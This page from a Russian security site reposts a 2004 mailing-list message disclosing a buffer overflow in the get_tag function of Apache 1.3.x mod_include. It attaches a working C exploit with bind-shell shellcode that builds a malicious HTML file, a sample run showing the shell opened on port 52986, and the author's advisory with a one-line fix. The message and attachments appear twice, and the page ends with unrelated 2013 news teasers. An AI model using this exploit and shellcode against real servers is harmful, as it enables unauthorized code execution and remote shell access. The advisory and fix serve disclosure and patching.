Уязвимости Apache mod_include Buffer Overflow and Exploit
21 октября, 2004
--0-1381269801-1098192635=:62976
Content-Type: text/plain; charset=us-ascii
Content-Id:
Content-Disposition: inline
Advisory & exploit code you can find in attachments
_______________________________
Do you Yahoo!?
Declare Yourself - Register online to vote today!
http://vote.yahoo.com
--0-1381269801-1098192635=:62976
Content-Type: text/plain; name="85mod_include.c"
Content-Description: 85mod_include.c
Content-Disposition: inline; filename="85mod_include.c"
/*********************************************************************************
local exploit for mod_include of apache 1.3.x *
written by xCrZx /18.10.2004/ *
bug found by xCrZx /18.10.2004/ *
*
y0das old shao lin techniq ownz u :) remember my words *
http://lbyte.ru/16-masta_killa-16-mastakilla-mad.mp3 *
*
Successfully tested on apache 1.3.31 under Linux RH9.0(Shrike) *
*********************************************************************************/
/*********************************************************************************
Technical Details: *
*
there is an overflow in get_tag function: *
*
static char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int dodecode) *
{ *
... *
term = c; *
while (1) { *
GET_CHAR(in, c, NULL, p); *
[1] if (t - tag == tagbuf_len) { *
*t = '\0'; *
return NULL; *
} *
// Want to accept \" as a valid character within a string. // *
if (c == '\\') { *
[2] *(t++) = c; // Add backslash // *
GET_CHAR(in, c, NULL, p); *
if (c == term) { // Only if // *
[3] *(--t) = c; // Replace backslash ONLY for terminator // *
} *
} *
else if (c == term) { *
break; *
} *
[4] *(t++) = c; *
} *
*t = '\0'; *
... *
*
as we can see there is a [1] check to determine the end of tag buffer *
but this check can be skiped when [2] & [4] conditions will be occured *
at the same time without [3] condition. *
*
So attacker can create malicious file to overflow static buffer, on *
which tag points out and execute arbitrary code with privilegies of *
httpd child process. *
*
Fix: *
[1*] if (t - tag >= tagbuf_len-1) { *
*
Notes: To activate mod_include you need write "XBitHack on" in httpd.conf *
*
*********************************************************************************/
/*********************************************************************************
Example of work: *
*
[root@blacksand htdocs]# make 85mod_include *
cc 85mod_include.c -o 85mod_include *
[root@blacksand htdocs]# ./85mod_include 0xbfff8196 > evil.html *
[root@blacksand htdocs]# chmod +x evil.html *
[root@blacksand htdocs]# netstat -na|grep 52986 *
[root@blacksand htdocs]# telnet localhost 8080 *
Trying 127.0.0.1... *
Connected to localhost. *
Escape character is '^]'. *
GET /evil.html HTTP/1.0 *
^] *
telnet> q *
Connection closed. *
[root@blacksand htdocs]# netstat -na|grep 52986 *
tcp 0 0 0.0.0.0:52986 0.0.0.0:* LISTEN *
[root@blacksand htdocs]# *
*********************************************************************************/
/*********************************************************************************
Notes: ha1fsatan - ti 4elovek-kakashka :))) be co0l as always *
*********************************************************************************/
/*********************************************************************************
Personal hello to my parents :) *
*********************************************************************************/
/*********************************************************************************
Public shoutz to: m00 security, ech0 :), LByte, 0xbadc0ded and otherz *
*********************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#define EVILBUF 8202
#define HTMLTEXT 1000
#define HTML_FORMAT "<html>\n<!--#echo done=\"%s\" -->\nxCrZx 0wn U\n</html>"
#define AUTHOR "\n*** local exploit for mod_include of apache 1.3.x by xCrZx /18.10.2004/ ***\n"
int main(int argc, char **argv) {
char html[EVILBUF+HTMLTEXT];
char evilbuf[EVILBUF+1];
//can be changed
char shellcode[] =
// bind shell on 52986 port
"\x31\xc0"
"\x31\xdb\x53\x43\x53\x89\xd8\x40\x50\x89\xe1\xb0\x66\xcd\x80\x43"
"\x66\xc7\x44\x24\x02\xce\xfa\xd1\x6c\x24\x04\x6a\x10\x51\x50\x89"
"\xe1\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x43\x89\x61\x08\xb0"
"\x66\xcd\x80\x93\x31\xc9\xb1\x03\x49\xb0\x3f\xcd\x80\x75\xf9\x68"
"\x2f\x73\x68\x20\x68\x2f\x62\x69\x6e\x88\x4c\x24\x07\x89\xe3\x51"
"\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";
//execve /tmp/sh <- your own program
/*
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/tmp/sh";
*/
char NOP[] = "\x90\x40"; // special nops ;)
char evilpad[] = "\\CRZCRZCRZCRZC"; // trick ;)
int padding,xpad=0;
int i,fd;
long ret=0xbfff8688;
if(argc>1) ret=strtoul(argv[1],0,16);
else { fprintf(stderr,AUTHOR"\nUsage: %s <RET ADDR> > file.html\n\n",argv[0]);exit(0); }
padding=(EVILBUF-1-strlen(shellcode)-4-strlen(evilpad)+2);
while(1) {
if(padding%2==0) { padding/=2; break;}
else {padding--;xpad++;}
}
memset(html,0x0,sizeof html);
memset(evilbuf,0x0,sizeof evilbuf);
for(i=0;i<padding;i++)
memcpy(evilbuf+strlen(evilbuf),&NOP,2);
for(i=0;i<xpad;i++)
memcpy(evilbuf+strlen(evilbuf),(evilbuf[strlen(evilbuf)-1]==NOP[1])?(&NOP[0]):(&NOP[1]),1);
memcpy(evilbuf+strlen(evilbuf),&shellcode,sizeof shellcode);
memcpy(evilbuf+strlen(evilbuf),&evilpad,sizeof evilpad);
*(long*)&evilbuf[strlen(evilbuf)]=ret;
sprintf(html,HTML_FORMAT,evilbuf);
printf("%s",html);
return 0;
}
--0-1381269801-1098192635=:62976
Content-Type: text/plain; name="85mod_include.adv.txt"
Content-Description: 85mod_include.adv.txt
Content-Disposition: inline; filename="85mod_include.adv.txt"
-------------------------------------
PUBLIC ADVISORY of xCrZx /18.10.2004/
=====================================
I. Intro
II. Details
III. Exploitation
IV. Solution
V. Outro
--------
I. Intro
========
mod_include is an apache standard module which allow users to
use some features in their html pages such as include file,
exec commands, echo, etc.
-----------
II. Details
===========
There is an overflow in get_tag() function, that was found by
me inside of mod_include.c:
static char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int dodecode)
{
...
term = c;
while (1) {
GET_CHAR(in, c, NULL, p);
[1] if (t - tag == tagbuf_len) {
*t = '\0';
return NULL;
}
/* Want to accept \" as a valid character within a string. */
if (c == '\\') {
[2] *(t++) = c; /* Add backslash */
GET_CHAR(in, c, NULL, p);
if (c == term) { /* Only if */
[3] *(--t) = c; /* Replace backslash ONLY for terminator */
}
}
else if (c == term) {
break;
}
[4] *(t++) = c;
}
*t = '\0';
...
}
as we can see there is a [1] check to determine the end of tag buffer
but this check can be skiped when [2] & [4] conditions will be occured
at the same time without [3] condition.
So attacker can create malicious file to overflow static buffer, on
which tag points out and execute arbitrary code with privilegies of
httpd child process.
for example, an overflow can be occured from handle_echo:
(or other similar functions handle_*())
static int handle_echo(FILE *in, request_rec *r, const char *error)
{
char tag[MAX_STRING_LEN];
...
while (1) {
if (!(tag_val = get_tag(r->pool, in, tag, sizeof(tag), 1))) {
return 1;
}
...
-----------------
III. Exploitation
=================
Exploit was created by me :) and successfully tested on apache 1.3.31 under
Linux RH9.0 (Shrike).
Vuln versions of apache: 1.3.x
------------
IV. Solution
============
To fix this vulnerability you must change one line in get_tag() function:
[1] if (t - tag == tagbuf_len) {
to
[1'] if (t - tag >= tagbuf_len-1) {
--------
V. Outro
========
y0das old shao lin techniq ownz u :) remember my words
http://lbyte.ru/16-masta_killa-16-mastakilla-mad.mp3
shoutz to: m00, LByte, ech0, ha1fsatan, 0xbadc0ded and others :)
and special hello to my parents :)
Copyright (C) xCrZx /18.10.2004/
--0-1381269801-1098192635=:62976--
Content-Type: text/plain; charset=us-ascii
Content-Id:
Content-Disposition: inline
Advisory & exploit code you can find in attachments
_______________________________
Do you Yahoo!?
Declare Yourself - Register online to vote today!
http://vote.yahoo.com
--0-1381269801-1098192635=:62976
Content-Type: text/plain; name="85mod_include.c"
Content-Description: 85mod_include.c
Content-Disposition: inline; filename="85mod_include.c"
/*********************************************************************************
local exploit for mod_include of apache 1.3.x *
written by xCrZx /18.10.2004/ *
bug found by xCrZx /18.10.2004/ *
*
y0das old shao lin techniq ownz u :) remember my words *
http://lbyte.ru/16-masta_killa-16-mastakilla-mad.mp3 *
*
Successfully tested on apache 1.3.31 under Linux RH9.0(Shrike) *
*********************************************************************************/
/*********************************************************************************
Technical Details: *
*
there is an overflow in get_tag function: *
*
static char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int dodecode) *
{ *
... *
term = c; *
while (1) { *
GET_CHAR(in, c, NULL, p); *
[1] if (t - tag == tagbuf_len) { *
*t = '\0'; *
return NULL; *
} *
// Want to accept \" as a valid character within a string. // *
if (c == '\\') { *
[2] *(t++) = c; // Add backslash // *
GET_CHAR(in, c, NULL, p); *
if (c == term) { // Only if // *
[3] *(--t) = c; // Replace backslash ONLY for terminator // *
} *
} *
else if (c == term) { *
break; *
} *
[4] *(t++) = c; *
} *
*t = '\0'; *
... *
*
as we can see there is a [1] check to determine the end of tag buffer *
but this check can be skiped when [2] & [4] conditions will be occured *
at the same time without [3] condition. *
*
So attacker can create malicious file to overflow static buffer, on *
which tag points out and execute arbitrary code with privilegies of *
httpd child process. *
*
Fix: *
[1*] if (t - tag >= tagbuf_len-1) { *
*
Notes: To activate mod_include you need write "XBitHack on" in httpd.conf *
*
*********************************************************************************/
/*********************************************************************************
Example of work: *
*
[root@blacksand htdocs]# make 85mod_include *
cc 85mod_include.c -o 85mod_include *
[root@blacksand htdocs]# ./85mod_include 0xbfff8196 > evil.html *
[root@blacksand htdocs]# chmod +x evil.html *
[root@blacksand htdocs]# netstat -na|grep 52986 *
[root@blacksand htdocs]# telnet localhost 8080 *
Trying 127.0.0.1... *
Connected to localhost. *
Escape character is '^]'. *
GET /evil.html HTTP/1.0 *
^] *
telnet> q *
Connection closed. *
[root@blacksand htdocs]# netstat -na|grep 52986 *
tcp 0 0 0.0.0.0:52986 0.0.0.0:* LISTEN *
[root@blacksand htdocs]# *
*********************************************************************************/
/*********************************************************************************
Notes: ha1fsatan - ti 4elovek-kakashka :))) be co0l as always *
*********************************************************************************/
/*********************************************************************************
Personal hello to my parents :) *
*********************************************************************************/
/*********************************************************************************
Public shoutz to: m00 security, ech0 :), LByte, 0xbadc0ded and otherz *
*********************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#define EVILBUF 8202
#define HTMLTEXT 1000
#define HTML_FORMAT "<html>\n<!--#echo done=\"%s\" -->\nxCrZx 0wn U\n</html>"
#define AUTHOR "\n*** local exploit for mod_include of apache 1.3.x by xCrZx /18.10.2004/ ***\n"
int main(int argc, char **argv) {
char html[EVILBUF+HTMLTEXT];
char evilbuf[EVILBUF+1];
//can be changed
char shellcode[] =
// bind shell on 52986 port
"\x31\xc0"
"\x31\xdb\x53\x43\x53\x89\xd8\x40\x50\x89\xe1\xb0\x66\xcd\x80\x43"
"\x66\xc7\x44\x24\x02\xce\xfa\xd1\x6c\x24\x04\x6a\x10\x51\x50\x89"
"\xe1\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x43\x89\x61\x08\xb0"
"\x66\xcd\x80\x93\x31\xc9\xb1\x03\x49\xb0\x3f\xcd\x80\x75\xf9\x68"
"\x2f\x73\x68\x20\x68\x2f\x62\x69\x6e\x88\x4c\x24\x07\x89\xe3\x51"
"\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";
//execve /tmp/sh <- your own program
/*
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/tmp/sh";
*/
char NOP[] = "\x90\x40"; // special nops ;)
char evilpad[] = "\\CRZCRZCRZCRZC"; // trick ;)
int padding,xpad=0;
int i,fd;
long ret=0xbfff8688;
if(argc>1) ret=strtoul(argv[1],0,16);
else { fprintf(stderr,AUTHOR"\nUsage: %s <RET ADDR> > file.html\n\n",argv[0]);exit(0); }
padding=(EVILBUF-1-strlen(shellcode)-4-strlen(evilpad)+2);
while(1) {
if(padding%2==0) { padding/=2; break;}
else {padding--;xpad++;}
}
memset(html,0x0,sizeof html);
memset(evilbuf,0x0,sizeof evilbuf);
for(i=0;i<padding;i++)
memcpy(evilbuf+strlen(evilbuf),&NOP,2);
for(i=0;i<xpad;i++)
memcpy(evilbuf+strlen(evilbuf),(evilbuf[strlen(evilbuf)-1]==NOP[1])?(&NOP[0]):(&NOP[1]),1);
memcpy(evilbuf+strlen(evilbuf),&shellcode,sizeof shellcode);
memcpy(evilbuf+strlen(evilbuf),&evilpad,sizeof evilpad);
*(long*)&evilbuf[strlen(evilbuf)]=ret;
sprintf(html,HTML_FORMAT,evilbuf);
printf("%s",html);
return 0;
}
--0-1381269801-1098192635=:62976
Content-Type: text/plain; name="85mod_include.adv.txt"
Content-Description: 85mod_include.adv.txt
Content-Disposition: inline; filename="85mod_include.adv.txt"
-------------------------------------
PUBLIC ADVISORY of xCrZx /18.10.2004/
=====================================
I. Intro
II. Details
III. Exploitation
IV. Solution
V. Outro
--------
I. Intro
========
mod_include is an apache standard module which allow users to
use some features in their html pages such as include file,
exec commands, echo, etc.
-----------
II. Details
===========
There is an overflow in get_tag() function, that was found by
me inside of mod_include.c:
static char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int dodecode)
{
...
term = c;
while (1) {
GET_CHAR(in, c, NULL, p);
[1] if (t - tag == tagbuf_len) {
*t = '\0';
return NULL;
}
/* Want to accept \" as a valid character within a string. */
if (c == '\\') {
[2] *(t++) = c; /* Add backslash */
GET_CHAR(in, c, NULL, p);
if (c == term) { /* Only if */
[3] *(--t) = c; /* Replace backslash ONLY for terminator */
}
}
else if (c == term) {
break;
}
[4] *(t++) = c;
}
*t = '\0';
...
}
as we can see there is a [1] check to determine the end of tag buffer
but this check can be skiped when [2] & [4] conditions will be occured
at the same time without [3] condition.
So attacker can create malicious file to overflow static buffer, on
which tag points out and execute arbitrary code with privilegies of
httpd child process.
for example, an overflow can be occured from handle_echo:
(or other similar functions handle_*())
static int handle_echo(FILE *in, request_rec *r, const char *error)
{
char tag[MAX_STRING_LEN];
...
while (1) {
if (!(tag_val = get_tag(r->pool, in, tag, sizeof(tag), 1))) {
return 1;
}
...
-----------------
III. Exploitation
=================
Exploit was created by me :) and successfully tested on apache 1.3.31 under
Linux RH9.0 (Shrike).
Vuln versions of apache: 1.3.x
------------
IV. Solution
============
To fix this vulnerability you must change one line in get_tag() function:
[1] if (t - tag == tagbuf_len) {
to
[1'] if (t - tag >= tagbuf_len-1) {
--------
V. Outro
========
y0das old shao lin techniq ownz u :) remember my words
http://lbyte.ru/16-masta_killa-16-mastakilla-mad.mp3
shoutz to: m00, LByte, ech0, ha1fsatan, 0xbadc0ded and others :)
and special hello to my parents :)
Copyright (C) xCrZx /18.10.2004/
--0-1381269801-1098192635=:62976--
Дата создания: 15.08.2005 16:16:00
Дата изменения: 17.10.2006 10:49:56
Количество показов: 4034
Блоги
21.05.2013
20-го мая инвестиционный фонд Vista Equity Partners объявило намерении приобрести известную и в Росс...
21.05.2013
Прежде всего – ура, опубликовано расписание форума, можно планировать. http://www.phdays.ru/upload/p...
21.05.2013
Как вы, наверное, уже заметили, Минюст зарегистрировал и опубликовал новый приказ ФСТЭК №21 от 18...
21.05.2013
Осталось всего два дня до начала третьего форума Positive Hack Days. Пора уже рассказать о том, что ...
20.05.2013
Ежегодно исследовательский институт по проблемам защиты информации "Ponemon Institute" про...
20.05.2013
Дождались, приказ ФСТЭК России №21 (он же SOISO) зарегистрирован в Минюсте.&...
20.05.2013
В комментариях к моему недавнему посту про положение Банка России №397-П, касающееся требований к...
20.05.2013
Обновил статистику по появлению нормативных актов по ИБ в России. Озвученная полгода назад цифра в...
19.05.2013
Румынская компания MB Telecom представила свое решение по защите от скимминга на банкоматах. Основна...
19.05.2013
551. Что нужно сделать ПЕРВЫМ при наступлении инцидента ИБ?
А. Документировать;
Б. На...
TOP Новости 
14 мая, 2013
По итогам экспертного исследования, японские мультфильмы были признаны детской порнографией.
14 мая, 2013
При регистрации почтового ящика вербуемый не должен был использовать свое личное устройство, содержащее...
15 мая, 2013
Хакер создал ботнет, позволиший ему отследить распространение Сети по всему миру.
15 мая, 2013
Все ссылки, переданные в Skype, проверяются с IP-адреса в штаб-квартире корпорации.
13 мая, 2013
Сообщение программиста компании Microsoft раскрывает причины низкой производительности ОС.
13 мая, 2013
Вместо паролей для аутентификации будет использоваться биометрическая аутентификация.
14 мая, 2013
Копия танковой баталии Ground War Tanks появилась в России при поддержке Mail.ru Group.
13 мая, 2013
Google планирует получить с продаж Android-устройств в 2,6 раза меньше, чем Microsoft.
15 мая, 2013
Патч для исправления уязвимости был выпущен для версии ядра 3.8.9.
18 мая, 2013
23 мая Владимир Жириновский даст старт всероссийскому веб-проекту "Интернет без наркотиков".
Уязвимости 20 мая, 2013
